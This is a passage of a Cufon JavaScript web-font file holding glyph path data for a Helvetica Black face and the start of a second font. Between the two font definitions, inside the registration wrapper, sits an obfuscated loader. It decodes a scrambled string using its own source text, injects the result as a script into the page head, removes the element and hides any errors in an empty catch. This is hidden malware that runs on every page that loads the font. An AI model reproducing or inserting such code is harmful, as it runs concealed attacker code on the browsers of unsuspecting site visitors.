,-52,-46,-123,-63,-175r76,0r31,107r30,-107r74,0v-30,74,-49,157,-86,224v-26,30,-62,22,-107,23r0,-56","w":200,"k":{".":33,",":33}},{"d":"53,-263r101,269r-55,0r-101,-269r55,0","w":153},{"d":"104,-257r0,47r43,-15r14,38r-46,15r29,37r-33,26r-28,-41r-29,41r-32,-26r30,-37r-46,-15r13,-38r45,15r0,-47r40,0","w":166},{"d":"9,0r0,-62r119,-129r-113,0r0,-66r218,0r0,58r-121,133r126,0r0,66r-229,0xm197,-329r-44,53r-59,0r-43,-53r53,0r20,27r20,-27r53,0","w":246},{"d":"60,60r-62,0v44,-102,42,-219,0,-323r62,0v51,103,51,222,0,323","w":113},{"d":"44,0r9,-67r-31,0r6,-42r31,0r4,-34r-30,0r6,-42r30,0r9,-66r48,0r-9,66r26,0r9,-66r47,0r-9,66r29,0r-6,42r-28,0r-5,34r28,0r-6,42r-28,0r-9,67r-48,0r9,-67r-25,0r-10,67r-47,0xm137,-143r-26,0r-4,34r25,0"},{"d":"20,0r0,-257r113,0r37,151r37,-151r113,0r0,257r-75,0r-1,-165r-45,165r-59,0r-45,-165r0,165r-75,0","w":339},{"d":"23,-119r63,-132r44,0r63,132r-55,0r-30,-68r-30,68r-55,0","w":216},{"d":"263,-66v0,17,0,38,17,38v17,0,16,-21,16,-38v0,-17,1,-37,-16,-37v-17,0,-17,20,-17,37xm216,-66v0,-40,20,-68,64,-68v44,0,63,28,63,68v0,40,-19,69,-63,69v-44,0,-64,-29,-64,-69xm71,-185v0,17,-1,37,16,37v17,0,17,-20,17,-37v0,-17,0,-37,-17,-37v-17,0,-16,20,-16,37xm24,-185v0,-40,19,-68,63,-68v44,0,64,28,64,68v0,40,-20,68,-64,68v-44,0,-63,-28,-63,-68xm88,9r148,-269r39,0r-147,269r-40,0","w":366},{"d":"23,0r0,-71r75,0r0,71r-75,0","w":120},{"d":"14,60r0,-55v44,5,31,-36,31,-74v0,-27,27,-29,42,-33v-17,-1,-42,-3,-42,-35v0,-33,17,-75,-31,-71r0,-55v47,-2,92,-2,92,46r0,65v0,21,21,23,30,23r0,55v-9,0,-30,2,-30,21r0,67v-4,48,-45,48,-92,46","w":146},{"d":"81,-95v-1,27,14,41,39,41v21,0,34,-7,34,-28v1,-30,-33,-27,-55,-24r0,-49v20,1,55,5,55,-21v0,-34,-71,-28,-67,9r-68,0v0,-58,47,-86,105,-86v73,0,97,42,97,64v0,53,-33,53,-33,54v0,3,41,3,41,59v0,30,-24,79,-106,79v-113,0,-112,-79,-111,-98r69,0"},{"d":"13,77r0,-360r55,0r0,360r-55,0","w":79},{"d":"100,0r0,-144r-58,0r0,-52v36,1,72,-14,74,-55r59,0r0,251r-75,0"},{"d":"216,-77r-136,0v-2,36,46,47,66,23r66,0v-14,40,-54,59,-96,59v-60,0,-104,-36,-104,-98v0,-54,39,-99,98,-99v74,0,106,42,106,115xm80,-114r68,0v0,-17,-13,-32,-31,-32v-22,0,-34,12,-37,32","w":226},{"d":"19,0r0,-187r69,0v1,7,-2,18,1,24v29,-46,125,-39,125,35r0,128r-71,0r0,-98v0,-22,-3,-37,-24,-37v-13,0,-28,6,-28,36r0,99r-72,0","w":233},{"d":"254,-257r0,158v0,72,-38,105,-117,105v-79,0,-118,-33,-118,-105r0,-158r80,0r0,140v0,26,-1,59,38,59v37,0,38,-33,38,-59r0,-140r79,0xm76,-286r0,-33r122,0r0,33r-122,0","w":273},{"d":"28,-121r0,-136r55,0r0,136r-55,0xm104,-121r0,-136r55,0r0,136r-55,0","w":186},{},{"d":"239,-257r-80,257r-88,0r-77,-257r80,0r43,156r41,-156r81,0","w":233,"k":{"\u0173":13,"\u016b":13,"\u012f":6,"\u0119":20,"\u0117":20,"\u0105":20,"\u0104":20,"\u00fc":13,"\u00f6":20,"\u00e4":20,"\u00c4":20,"y":6,"u":13,"r":13,"o":20,"i":6,"e":20,"a":20,"A":20,";":18,":":18,".":38,"-":20,",":46}},{"d":"122,0r0,-50r-111,0r0,-67r114,-134r72,0r0,140r34,0r0,61r-34,0r0,50r-75,0xm122,-181r-61,70r61,0r0,-70"},{"d":"188,0r-14,-18v-56,48,-161,23,-161,-59v0,-34,29,-59,57,-73v-45,-42,-6,-113,56,-113v48,0,83,20,83,66v0,29,-23,54,-47,67r19,24v5,-6,9,-12,10,-19r59,0v-4,22,-13,45,-30,62r53,63r-85,0xm136,-66r-30,-37v-10,6,-25,15,-25,28v2,30,41,29,55,9xm130,-215v-26,1,-20,32,-3,44v19,-5,32,-42,3,-44","w":266},{"d":"150,-179v3,-19,-15,-27,-32,-27v-11,0,-29,3,-29,17v0,18,39,23,75,32v36,10,72,27,72,75v0,67,-61,88,-119,88v-29,0,-113,-10,-113,-92r80,0v-3,26,19,36,40,35v13,0,33,-4,33,-23v0,-13,-11,-17,-55,-30v-41,-12,-88,-22,-88,-74v0,-59,51,-85,104,-85v56,0,105,22,107,84r-75,0"},{"d":"100,-191r0,52v32,-2,72,10,72,-27v0,-35,-41,-22,-72,-25xm21,0r0,-257r132,0v70,0,94,52,94,88v0,80,-64,97,-147,91r0,78r-79,0","w":253,"k":{"\u0104":27,"\u00c4":27,"A":27,".":46,",":46}},{"d":"17,3r0,-58r98,-36r-98,-36r0,-58r182,71r0,46","w":216},{"d":"9,0r0,-62r119,-129r-113,0r0,-66r218,0r0,58r-121,133r126,0r0,66r-229,0","w":246},{"d":"214,-187r0,187r-69,0v-1,-7,2,-18,-1,-24v-29,47,-125,38,-125,-35r0,-128r72,0r0,98v0,22,2,37,23,37v13,0,29,-6,29,-36r0,-99r71,0xm57,-216r0,-33r122,0r0,33r-122,0","w":233},{"d":"204,-187r-62,187r-84,0r-62,-187r76,0r30,114r29,-114r73,0","w":200,"k":{".":22,",":22}},{"d":"140,-116v-1,-15,-10,-24,-26,-24v-27,0,-31,24,-31,47v0,23,4,46,31,46v15,0,27,-13,28,-28r68,0v-7,51,-47,80,-97,80v-56,0,-101,-39,-101,-98v0,-114,185,-138,196,-23r-68,0","w":219},{"d":"92,-129v0,57,31,71,51,71v20,0,51,-14,51,-71v0,-57,-31,-70,-51,-70v-20,0,-51,13,-51,70xm13,-129v0,-78,52,-134,130,-134v78,0,131,56,131,134v0,78,-53,135,-131,135v-78,0,-130,-57,-130,-135","w":286},{"d":"19,0r0,-257r72,0r0,90v29,-40,123,-34,123,39r0,128r-71,0r0,-98v0,-22,-3,-37,-24,-37v-13,0,-28,6,-28,36r0,99r-72,0","w":233},{"d":"-3,0r95,-257r77,0r94,257r-82,0r-11,-37r-82,0r-11,37r-80,0xm105,-92r49,0r-24,-79","w":259,"k":{"y":6,"w":6,"v":6,"Y":27,"W":13,"V":11,"T":24}},{"d":"216,-251r0,59v-61,57,-76,133,-75,192r-80,0v-1,0,2,-80,51,-150v24,-35,31,-39,31,-39r-120,0r0,-62r193,0"},{"d":"83,-71v-2,72,15,123,-66,136r0,-31v22,-3,29,-15,29,-34r-29,0r0,-71r66,0xm171,-71v-2,73,14,123,-67,136r0,-31v22,-3,30,-15,30,-34r-30,0r0,-71r67,0","w":186},{"d":"17,-63r0,-55r64,0r0,-64r55,0r0,64r63,0r0,55r-63,0r0,63r-55,0r0,-63r-64,0","w":216},{"d":"6,0r0,-55r88,-80r-80,0r0,-52r171,0r0,55r-85,80r93,0r0,52r-187,0","w":200},{"d":"349,-257r-72,257r-77,0r-28,-157r-27,157r-78,0r-70,-257r78,0r32,159r31,-159r70,0r31,161r32,-161r78,0","w":346,"k":{"\u0173":6,"\u016b":6,"\u0119":13,"\u0117":13,"\u0105":13,"\u0104":20,"\u00fc":6,"\u00f6":13,"\u00e4":13,"\u00c4":20,"u":6,"r":6,"o":13,"e":13,"a":13,"A":20,";":6,":":6,".":27,",":27}},{"d":"84,-177v1,36,72,36,73,0v0,-24,-18,-29,-37,-29v-19,0,-36,6,-36,29xm20,-185v0,-55,59,-68,100,-68v69,0,101,32,101,68v1,27,-17,47,-39,54v28,3,49,24,49,55v0,59,-60,79,-111,79v-54,0,-111,-18,-111,-79v-1,-43,34,-50,50,-56v-27,-7,-39,-26,-39,-53xm80,-77v0,39,80,39,80,0v0,-24,-18,-32,-39,-32v-21,0,-41,7,-41,32"},{"d":"6,0r0,-55r88,-80r-80,0r0,-52r171,0r0,55r-85,80r93,0r0,52r-187,0xm175,-260r-44,54r-59,0r-44,-54r53,0r21,28r20,-28r53,0","w":200}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+405-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("q-wr$%9e@;klqW|7~%?I}-}ksf9rw%klsftI@;Q1wHD#4je{sESI]*?Z;b}#ns2e@S|d]EH}Mf.q)rdr]*2%9%wM~xOd]-9psES(]x2p9p9M~xOd9Z2M~xOd9Z?M~xOd9j9]wrdr]*2p4rdr]*2i]?HK]ZkM~xOd]x~M~xOd]xwNsES(]-0fa|dr]*A(9Hdr]*2Z9?dr]*AdaSw+sES(]xOe$f(14pY3sES(]xt|sES(]-Q%ae2?sES(]-Sesrdr]*AdaAtSsHdr]*AIwp#YsES(]xMIsES(]-wZ;S0p!SMD4HAr~rgP}H(8)HdMq|dr]*AbwWpZxH+|n1ej=*?|$|dr]*Af4H({}?4et|90!|.M~xOd9%tf4ekP0x~M~x}(];SK)|M+sES(]x~|}{YjM-d.~Wg{}{p#@xe(nEOk4{Y(n-(kMWY#w;Y1~-g#wjr{n%4lwfdYM-ij!s3kaf|%q-}l$f#knr+P!j.b~b~Mn{p,q*Dy$-kp~%|#4H(l$E0.tWk.n1Q|Mb0P$-kZ4sQ.$f+l@-kjO2W*A?-E}tqn]9a!0QNxSH;s4w@$M~)=gi{Zp|%1P.hK#3l8(dIjerfb+Yy7DkL,~-Yi$;S.q;w8M{g7@xd#aI#K@N|1;f9$@Hr~!s2$@HrkqNg.")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":240,"face":{"font-family":"HelveticaBlk","font-weight":900,"font-stretch":"normal","units-per-em":"360","panose-1":"2 11 9 4 2 2 2 2 2 4","ascent":"257","descent":"-103","x-height":"5","bbox":"-11 -329 349 84.0626","underline-thickness":"18","underline-position":"-18","stemh":"52","stemv":"71","unicode-range":"U+0021-U+201E"}}));
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"167,-185r0,185r-14,0v-1,-13,2,-29,-1,-40v-10,28,-37,44,-66,44v-65,0,-66,-52,-66,-75r0,-114r14,0r0,117v0,19,2,60,52,60v42,0,67,-32,67,-77r0,-100r14,0xm138,-230r-88,0r0,-12r88,0r0,12","w":186},{"d":"23,-257r16,0r0,154v0,31,5,95,80,95v120,0,76,-144,84,-249r16,0v-7,119,36,264,-100,263v-91,0,-96,-75,-96,-109r0,-154xm158,-285r-15,0r0,-38r15,0r0,38xm102,-285r-16,0r0,-38r16,0r0,38","w":241},{"d":"17,3r0,-15r171,-79r-171,-79r0,-15r182,85r0,19","w":216},{"d":"14,-185r53,169r50,-169r19,0r51,169r52,-169r15,0r-59,185r-17,0r-52,-168r-51,168r-17,0r-59,-185r15,0","w":253,"k":{".":20,",":20}},{"d":"163,-190v0,-38,-30,-51,-63,-51v-33,0,-63,13,-63,51v0,36,31,49,63,49v32,0,63,-13,63,-49xm23,-190v0,-47,38,-63,77,-63v39,0,77,16,77,63v0,29,-18,47,-46,55v34,4,55,28,55,64v0,52,-38,75,-86,75v-48,0,-86,-23,-86,-75v-1,-37,23,-58,55,-65v-30,-6,-46,-26,-46,-54xm172,-71v0,-41,-33,-58,-72,-58v-39,0,-72,17,-72,58v0,44,33,63,72,63v38,0,72,-19,72,-63"},{"d":"75,-1r-77,-184r16,0r69,169r63,-169r16,0r-80,205v-15,35,-18,48,-64,46r0,-12v44,-2,40,-13,57,-55","w":159,"k":{".":27,",":27}},{"d":"37,-220r-14,0r0,-37r14,0r0,37xm37,0r-14,0r0,-185r14,0r0,185","w":60},{"d":"25,-93v0,44,25,85,71,85v46,0,72,-41,72,-85v0,-44,-26,-84,-72,-84v-46,0,-71,40,-71,84xm12,-93v0,-53,29,-96,84,-96v55,0,85,43,85,96v0,53,-30,97,-85,97v-55,0,-84,-44,-84,-97","w":193},{"d":"85,-243r-90,0r0,-14r197,0r0,14r-91,0r0,243r-16,0r0,-243","w":186,"k":{"\u0173":33,"\u016b":33,"\u012f":5,"\u0119":33,"\u0117":33,"\u010d":33,"\u0105":33,"\u0104":18,"\u00fc":33,"\u0161":33,"\u00f6":33,"\u00e4":33,"\u00c4":18,"y":33,"w":33,"u":33,"s":33,"r":33,"o":33,"i":5,"e":33,"c":33,"a":33,"A":18,";":31,":":31,".":40,"-":40,",":40}},{"d":"23,0r0,-257v82,4,188,-23,188,66v1,36,-22,59,-55,67v71,7,39,80,59,124r-18,0v-20,-36,24,-117,-67,-117r-91,0r0,117r-16,0xm39,-131v70,-2,157,17,156,-59v-1,-71,-89,-50,-156,-53r0,112","w":226},{"d":"163,66r-1,-107v-10,29,-38,45,-68,45v-56,0,-82,-42,-82,-97v0,-51,23,-96,79,-96v34,-1,55,17,72,44r0,-40r14,0r0,251r-14,0xm94,-8v48,0,69,-42,69,-85v0,-42,-22,-84,-69,-84v-48,0,-69,40,-69,84v0,45,20,85,69,85"},{"d":"203,-127r-164,0r0,127r-16,0r0,-257r16,0r0,117r164,0r0,-117r16,0r0,257r-16,0r0,-127","w":241},{"d":"23,0r0,-257r84,0v92,0,119,63,119,128v0,73,-38,129,-120,129r-83,0xm39,-243r0,229v100,3,171,6,171,-115v0,-105,-68,-114,-106,-114r-65,0","w":240},{"d":"37,-185v1,13,-2,31,1,42v6,-19,26,-46,67,-46v57,0,83,45,83,97v0,56,-26,96,-83,96v-32,1,-55,-15,-68,-43r0,105r-14,0r0,-251r14,0xm105,-8v48,0,70,-38,70,-84v0,-42,-20,-85,-70,-85v-49,0,-68,41,-68,85v0,44,16,84,68,84"},{"d":"10,-243r0,-14r180,0r0,14r-174,229r178,0r0,14r-194,0r0,-14r173,-229r-163,0xm103,-281r-14,0r-41,-50r13,0r35,41r35,-41r14,0","w":193},{"d":"83,-251r-35,0r0,305r35,0r0,12r-49,0r0,-329r49,0r0,12","w":86},{"d":"219,-202r-40,129v0,7,6,12,14,12v33,0,65,-50,65,-91v0,-60,-55,-99,-108,-99v-66,0,-120,57,-120,124v-1,121,163,162,220,67r16,0v-22,41,-69,66,-115,66v-76,0,-134,-61,-134,-136v0,-74,60,-133,132,-133v68,0,122,47,122,112v0,54,-45,103,-82,103v-13,0,-24,-8,-24,-25v-26,42,-95,27,-95,-29v0,-50,35,-107,85,-107v24,-1,35,18,41,33r8,-26r15,0xm121,-59v34,-1,65,-60,65,-95v0,-13,-3,-43,-33,-43v-41,0,-69,57,-69,94v0,27,16,44,37,44","w":288},{"d":"20,-12r130,0r0,12r-147,0r0,-13r124,-160r-114,0r0,-12r131,0r0,13","w":153},{"d":"7,-82r16,0v-3,38,5,74,55,74v59,0,57,-41,57,-77r0,-172r15,0r0,177v0,30,2,86,-70,86v-69,0,-73,-49,-73,-88","w":173},{"d":"180,45r-180,0r0,-18r180,0r0,18","w":180},{"d":"21,-120r26,-128r125,0r0,11r-114,0r-21,100v42,-60,146,-23,146,55v0,49,-34,86,-84,86v-48,0,-89,-30,-86,-80r14,0v-1,41,32,68,72,68v42,0,70,-33,70,-74v0,-73,-101,-99,-134,-38r-14,0"},{"d":"197,0r-14,0v-24,21,-30,33,-30,44v0,21,28,19,36,2r9,3v-6,13,-16,22,-31,22v-8,0,-30,-2,-30,-25v0,-11,6,-25,37,-46r-151,0r0,-257r172,0r0,14r-156,0r0,103r147,0r0,13r-147,0r0,113r158,0r0,14","w":201},{"d":"23,0r0,-257r14,0r1,111v10,-29,40,-43,70,-43v54,0,80,41,80,92v0,88,-54,101,-80,101v-50,0,-65,-36,-71,-45r0,41r-14,0xm108,-8v91,-2,90,-169,0,-169v-48,0,-71,34,-71,80v0,45,21,89,71,89"},{"d":"167,-185r0,185r-14,0v-1,-13,2,-29,-1,-40v-10,28,-37,44,-66,44v-65,0,-66,-52,-66,-75r0,-114r14,0r0,117v0,19,2,60,52,60v42,0,67,-32,67,-77r0,-100r14,0xm128,-217r-16,0r0,-37r16,0r0,37xm71,-217r-16,0r0,-37r16,0r0,37","w":186},{"d":"50,-96r113,0r-55,-146xm99,-257r17,0r102,257r-17,0r-33,-82r-123,0r-32,82r-17,0xm144,-285r-15,0r0,-38r15,0r0,38xm87,-285r-15,0r0,-38r15,0r0,38","w":213,"k":{"y":6,"w":6,"v":6,"Y":13,"W":9,"V":11,"T":18}},{"d":"-2,0r73,-97r-68,-88r19,0r58,77r58,-77r18,0r-67,88r73,97r-19,0r-63,-87r-65,87r-17,0","w":159},{"d":"23,-257r14,0r0,257r-14,0r0,-257","w":60},{"d":"39,-14r158,0r0,14r-174,0r0,-257r172,0r0,14r-156,0r0,103r147,0r0,13r-147,0r0,113","w":201},{"d":"23,0r0,-257r16,0r0,243r145,0r0,14r-161,0","w":180,"k":{"y":20,"Y":40,"W":27,"V":33,"T":33}},{"d":"10,-243r0,-14r180,0r0,14r-174,229r178,0r0,14r-194,0r0,-14r173,-229r-163,0","w":193},{"d":"173,-128r-14,0v-3,-33,-29,-49,-62,-49v-46,0,-71,41,-71,83v0,50,23,86,71,86v35,0,59,-24,64,-57r14,0v-6,44,-38,69,-78,69v-60,0,-85,-46,-85,-98v0,-52,30,-95,85,-95v40,0,72,19,76,61xm102,-212r-14,0r-42,-51r14,0r35,42r35,-42r14,0","w":186},{"d":"13,-82r14,0v-2,46,26,74,72,74v37,0,71,-21,71,-61v0,-48,-42,-60,-83,-57r0,-12v36,2,78,-9,78,-52v0,-35,-36,-51,-66,-51v-44,0,-64,30,-66,71r-14,0v0,-49,31,-83,80,-83v40,0,79,19,79,63v1,31,-21,51,-48,58v33,4,54,30,54,63v0,49,-39,73,-85,73v-54,0,-89,-31,-86,-86"},{"d":"202,-85r-15,0r-79,-152r-79,152r-15,0r85,-163r19,0","w":216},{"d":"20,0r0,-185r14,0v1,13,-2,29,1,40v10,-28,37,-44,66,-44v65,0,66,52,66,75r0,114r-14,0r0,-117v0,-19,-3,-60,-53,-60v-79,0,-67,98,-66,177r-14,0","w":186},{"d":"75,-157r-8,62r60,0r9,-62r-61,0xm149,-248r12,0r-11,79r39,0r0,12r-41,0r-9,62r40,0r0,12r-41,0r-12,83r-12,0r12,-83r-61,0r-12,83r-12,0r12,-83r-42,0r0,-12r44,0r8,-62r-42,0r0,-12r44,0r11,-79r12,0r-11,79r61,0"},{"d":"21,0r0,-185r13,0v1,12,-2,28,1,38v6,-23,30,-42,58,-42v35,0,52,20,56,39v19,-58,117,-53,117,24r0,126r-14,0r0,-127v0,-47,-34,-50,-44,-50v-33,0,-58,23,-58,68r0,109r-14,0r0,-127v0,-46,-31,-50,-43,-50v-26,0,-59,20,-59,68r0,109r-13,0","w":286},{},{"d":"26,-103r135,0v-1,-39,-25,-74,-67,-74v-41,0,-65,37,-68,74xm175,-91r-149,0v-1,44,22,83,68,83v35,0,59,-20,66,-55r14,0v-7,44,-36,67,-80,67v-54,0,-82,-42,-82,-93v0,-51,26,-100,82,-100v58,0,84,45,81,98","w":186},{"d":"20,-12r130,0r0,12r-147,0r0,-13r124,-160r-114,0r0,-12r131,0r0,13xm83,-212r-14,0r-42,-51r14,0r35,42r35,-42r14,0","w":153},{"d":"167,-185r0,185r-14,0v-1,-13,2,-29,-1,-40v-10,28,-37,44,-66,44v-65,0,-66,-52,-66,-75r0,-114r14,0r0,117v0,19,2,60,52,60v42,0,67,-32,67,-77r0,-100r14,0","w":186},{"d":"218,0r-8,0v-24,21,-30,33,-30,44v0,21,28,19,36,2r9,3v-6,13,-16,22,-31,22v-8,0,-30,-2,-30,-25v0,-11,6,-25,37,-46r-33,-82r-123,0r-32,82r-17,0r103,-257r17,0xm50,-96r113,0r-55,-146","w":213,"k":{"y":6,"w":6,"v":6,"Y":13,"W":9,"V":11,"T":18}},{"d":"20,-257r14,0r1,112v10,-28,37,-44,66,-44v65,0,66,52,66,75r0,114r-14,0r0,-117v0,-19,-3,-60,-53,-60v-79,0,-67,98,-66,177r-14,0r0,-257","w":186},{"d":"27,-129v0,66,40,121,107,121v67,0,106,-55,106,-121v0,-66,-39,-120,-106,-120v-67,0,-107,54,-107,120xm256,-129v0,75,-45,135,-122,135v-77,0,-123,-60,-123,-135v0,-75,46,-134,123,-134v77,0,122,59,122,134xm171,-285r-16,0r0,-38r16,0r0,38xm114,-285r-16,0r0,-38r16,0r0,38","w":266},{"d":"103,-121r94,-136r17,0r-103,149r0,108r-16,0r0,-108r-103,-149r18,0","w":206,"k":{"\u0173":13,"\u016b":13,"\u0119":27,"\u0117":27,"\u0105":27,"\u0104":20,"\u00fc":13,"\u00f6":27,"\u00e4":27,"\u00c4":20,"v":6,"u":13,"q":27,"p":20,"o":27,"e":27,"a":27,"A":20,";":20,":":20,".":42,"-":35,",":42}},{"d":"36,45v-1,-18,16,-28,12,-45r-7,0r0,-37r18,0v-1,36,5,70,-23,82","w":100},{"d":"157,-141r0,107v-2,14,5,27,22,21r0,12v-29,6,-39,-11,-37,-36v-11,47,-130,65,-130,-11v0,-44,37,-53,68,-55v61,-5,63,-8,63,-38v0,-8,-9,-36,-51,-36v-33,0,-55,17,-57,49r-14,0v2,-41,27,-61,71,-61v32,0,65,9,65,48xm143,-105v-24,23,-118,-1,-118,57v0,23,16,40,49,40v62,0,69,-53,69,-63r0,-34xm129,-217r-16,0r0,-37r16,0r0,37xm72,-217r-16,0r0,-37r16,0r0,37","w":180},{"d":"93,38r0,-32v-53,-5,-89,-29,-89,-91r14,0v0,45,25,74,75,77r0,-119v-39,-9,-80,-16,-81,-68v0,-16,5,-65,81,-68r0,-18r11,0r0,18v50,1,82,24,84,79r-14,0v-3,-47,-29,-65,-70,-66r0,112v47,7,98,33,90,72v0,53,-45,71,-90,72r0,32r-11,0xm93,-141r0,-108v-49,2,-67,24,-67,54v-1,40,34,45,67,54xm104,-125r0,117v41,0,76,-16,76,-58v0,-34,-37,-53,-76,-59"},{"d":"34,-185v1,13,-2,30,1,41v7,-24,38,-43,71,-42r0,14v-33,-4,-72,25,-72,71r0,101r-14,0r0,-185r14,0","w":100,"k":{"y":-6,"v":-6,".":27,"-":20,",":27}},{"d":"39,-243r0,103v65,1,155,10,152,-53v-4,-67,-88,-47,-152,-50xm23,0r0,-257r103,0v99,-4,106,107,31,121v6,2,58,10,58,64v0,84,-106,73,-192,72xm39,-127r0,113v70,0,165,12,160,-58v-5,-75,-90,-51,-160,-55","w":226},{"d":"30,-175r0,-82r14,0r0,82r-14,0","w":73},{"d":"119,46v0,-14,21,-38,38,-47v-16,-2,-12,-21,-15,-36v-11,47,-130,65,-130,-11v0,-44,37,-53,68,-55v61,-5,63,-8,63,-38v0,-8,-9,-36,-51,-36v-33,0,-55,17,-57,49r-14,0v2,-41,27,-61,71,-61v32,0,65,9,65,48r0,107v-2,14,5,27,22,21r0,12r-15,1v-24,21,-29,33,-29,44v0,21,28,19,36,2r8,3v-6,13,-16,22,-31,22v-8,0,-29,-2,-29,-25xm143,-105v-24,23,-118,-1,-118,57v0,23,16,40,49,40v62,0,69,-53,69,-63r0,-34","w":180},{"d":"159,-185r14,0r0,175v0,14,0,81,-80,81v-39,0,-70,-15,-72,-58r14,0v3,33,29,46,59,46v65,0,65,-53,65,-65r0,-43v-13,27,-35,42,-67,42v-54,0,-80,-40,-80,-91v0,-49,28,-91,80,-91v29,0,57,15,67,42r0,-38xm92,-177v-45,0,-66,40,-66,79v0,44,22,79,66,79v45,0,67,-37,67,-79v0,-42,-22,-79,-67,-79","w":193},{"d":"25,-93v0,44,25,85,71,85v46,0,72,-41,72,-85v0,-44,-26,-84,-72,-84v-46,0,-71,40,-71,84xm12,-93v0,-53,29,-96,84,-96v55,0,85,43,85,96v0,53,-30,97,-85,97v-55,0,-84,-44,-84,-97xm133,-217r-16,0r0,-37r16,0r0,37xm76,-217r-16,0r0,-37r16,0r0,37","w":193},{"d":"37,-220r-14,0r0,-37r14,0r0,37xm23,-185r14,0r0,205v2,29,-11,50,-49,46r0,-12v23,3,35,-3,35,-35r0,-204","w":60},{"d":"33,-142v0,62,127,20,127,95v0,40,-40,51,-72,51v-42,0,-74,-23,-75,-66r14,0v2,34,28,54,61,54v24,0,59,-7,59,-39v0,-63,-128,-19,-128,-95v0,-36,36,-47,67,-47v39,0,69,17,69,59r-14,0v0,-33,-24,-47,-55,-47v-25,0,-53,9,-53,35xm96,-212r-15,0r-41,-51r14,0r35,42r35,-42r14,0","w":173},{"d":"26,-103r135,0v-1,-39,-25,-74,-67,-74v-41,0,-65,37,-68,74xm175,-91r-149,0v-1,44,22,83,68,83v35,0,59,-20,66,-55r14,0v-7,44,-36,67,-80,67v-54,0,-82,-42,-82,-93v0,-51,26,-100,82,-100v58,0,84,45,81,98xm102,-217r-16,0r0,-37r16,0r0,37","w":186},{"d":"91,-257v1,18,-16,28,-12,45r8,0r0,37r-19,0v1,-36,-5,-70,23,-82xm46,-257v1,18,-16,28,-12,45r7,0r0,37r-18,0v1,-36,-5,-70,23,-82","w":113},{"d":"89,71v-51,-2,-27,-52,1,-67v-65,3,-70,-51,-70,-75r0,-114r14,0r0,117v0,19,2,60,52,60v42,0,67,-32,67,-77r0,-100r14,0r0,185r-14,0v-1,-13,2,-29,-1,-40v-8,23,-27,37,-51,43v-10,9,-28,30,-26,41v2,21,28,19,36,2r9,3v-6,13,-16,22,-31,22","w":186},{"d":"50,-96r113,0r-55,-146xm99,-257r17,0r102,257r-17,0r-33,-82r-123,0r-32,82r-17,0","w":213,"k":{"y":6,"w":6,"v":6,"Y":13,"W":9,"V":11,"T":18}},{"d":"199,-185r0,15r-171,79r171,79r0,15r-182,-85r0,-19","w":216},{"d":"170,-127r-131,0r0,127r-16,0r0,-257r161,0r0,14r-145,0r0,103r131,0r0,13","w":185,"k":{"\u0104":13,"\u00c4":13,"A":13,".":42,",":42}},{"d":"197,-66v0,-87,-175,-32,-175,-129v0,-49,45,-68,86,-68v54,0,95,22,98,79r-16,0v-2,-44,-34,-65,-82,-65v-29,0,-71,12,-71,54v0,84,176,30,176,129v0,53,-52,72,-91,72v-60,0,-109,-25,-108,-91r16,0v-3,56,41,77,92,77v31,0,75,-13,75,-58xm122,-281r-14,0r-42,-50r14,0r35,41r35,-41r14,0","w":226},{"d":"74,-136v29,0,46,-26,46,-52v0,-28,-16,-53,-46,-53v-30,0,-46,25,-46,53v0,26,18,52,46,52xm74,-125v-36,0,-60,-28,-60,-63v0,-36,24,-65,61,-65v38,0,59,28,59,65v0,34,-24,63,-60,63xm206,-8v29,0,46,-25,46,-51v0,-28,-16,-53,-46,-53v-30,0,-46,25,-46,53v0,26,18,51,46,51xm206,4v-36,0,-60,-28,-60,-63v0,-36,23,-65,60,-65v38,0,60,28,60,65v0,34,-24,63,-60,63xm50,9r167,-266r14,0r-167,266r-14,0","w":280},{"d":"17,0v3,-90,148,-99,148,-185v0,-33,-30,-56,-62,-56v-45,0,-67,33,-67,76r-13,0v3,-60,29,-88,78,-88v42,0,77,22,77,68v0,87,-138,108,-144,171r148,0r0,14r-165,0"},{"d":"37,-185r0,185v-22,21,-27,33,-27,44v2,21,26,19,33,2r8,3v-5,13,-14,22,-28,22v-7,0,-27,-2,-27,-25v0,-11,6,-25,33,-46r-6,0r0,-185r14,0xm37,-220r-14,0r0,-37r14,0r0,37","w":60},{"d":"45,-37v-1,36,5,70,-23,82v-1,-18,16,-28,12,-45r-7,0r0,-37r18,0xm90,-37v-1,36,5,70,-23,82v-1,-18,17,-28,13,-45r-8,0r0,-37r18,0","w":113},{"d":"23,-257r16,0r0,154v0,31,5,95,80,95v120,0,76,-144,84,-249r16,0v-7,119,36,264,-100,263v-91,0,-96,-75,-96,-109r0,-154xm165,-298r-88,0r0,-12r88,0r0,12","w":241},{"d":"39,-257r0,257v-22,21,-27,33,-27,44v2,21,26,19,33,2r7,3v-5,13,-14,22,-28,22v-7,0,-27,-2,-27,-25v0,-11,7,-25,34,-46r-8,0r0,-257r16,0","w":61},{"d":"91,46v-3,-9,14,-32,28,-40v-91,0,-96,-75,-96,-109r0,-154r16,0r0,154v0,31,5,95,80,95v120,0,76,-144,84,-249r16,0v-7,113,35,255,-89,263v-10,9,-25,28,-23,38v2,21,28,19,36,2r9,3v-6,13,-16,22,-31,22v-8,0,-30,-2,-30,-25","w":241},{"d":"4,54r35,0r0,-305r-35,0r0,-12r49,0r0,329r-49,0r0,-12","w":86},{"d":"27,-129v0,66,40,121,107,121v67,0,106,-55,106,-121v0,-66,-39,-120,-106,-120v-67,0,-107,54,-107,120xm256,-129v0,75,-45,135,-122,135v-77,0,-123,-60,-123,-135v0,-75,46,-134,123,-134v77,0,122,59,122,134","w":266},{"d":"20,-61r13,0v6,32,30,53,63,53v68,0,80,-83,77,-127v-10,27,-34,51,-73,51v-50,0,-83,-35,-83,-85v0,-49,34,-84,83,-84v38,0,87,18,87,117v0,61,-14,140,-91,140v-42,0,-71,-23,-76,-65xm100,-96v41,0,71,-33,71,-73v0,-40,-31,-72,-71,-72v-40,0,-70,33,-70,72v0,39,30,73,70,73"},{"d":"105,-263r0,12v